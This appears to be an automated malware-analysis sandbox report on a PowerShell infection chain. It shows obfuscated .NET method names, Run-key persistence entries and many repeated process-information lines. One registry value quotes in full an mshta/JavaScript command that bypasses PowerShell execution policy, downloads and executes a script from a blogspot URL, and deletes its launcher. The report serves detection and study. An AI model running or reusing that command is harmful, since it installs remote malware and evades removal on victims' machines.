Source: 17.2.powershell.exe.23ac8ff6158.2.raw.unpack, W3mIAMad8mK4ZyYb8CQ.cs	High entropy of concatenated method names: 'OHhxno9LMv59JwkpBPX', 'G66a6A9UBrBVeZ9yO97', 'Qn5CJCt4Zo', 'vh0ry9Sq2v', 'NAgCzWe3ZP', 'pY9pAMnRJn', 't34paM2Ne2', 'xvopCy1n4p', 'FjhRFseRF0', 'AWLahn4oRf'
Source: 17.2.powershell.exe.23ac8ff6158.2.raw.unpack, B.cs	High entropy of concatenated method names: 'Main', 'w0wVCfytf', 'KimKarden', 'eVExnSBWA', 'H7e8o26fl', 'HiPnANG73', 'agI9UShdl', 'lskkZTUSN', 'jtX7KDGmL', 'hCmRr5SQP'
Source: 17.2.powershell.exe.23ac8ff6158.2.raw.unpack, A9CvUGp4kU1V2hHRFHn.cs	High entropy of concatenated method names: 'OX7e2Hy5Pt', 'dWKevvZJWu', 'rs4eoMXh0k', 'C7heyHoNeq', 'VmMegQgJFI', 'sPJeTlCyGc', 'gveeEdLYki', 'TmWWCaItRt', 'JXxeXmkKa9', 'cJwe5uCKXW'

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Usecurekala74

Jump to behavior

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Usecurekala74 mshta "javascript:var ffh = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], xao = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], gur = new ActiveXObject(ffh[0]); gur[ffh[1]](ffh[2], ffh[3], ffh[4], ffh[5], ffh[6]);close(); new ActiveXObject(xao[0])[xao[1]](WScript[xao[2]]);"

Jump to behavior

Creates multiple autostart registry keys

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Usecurekala74			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run drakekala162			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Usecurekala74	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Usecurekala74	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run drakekala162	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run drakekala162	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
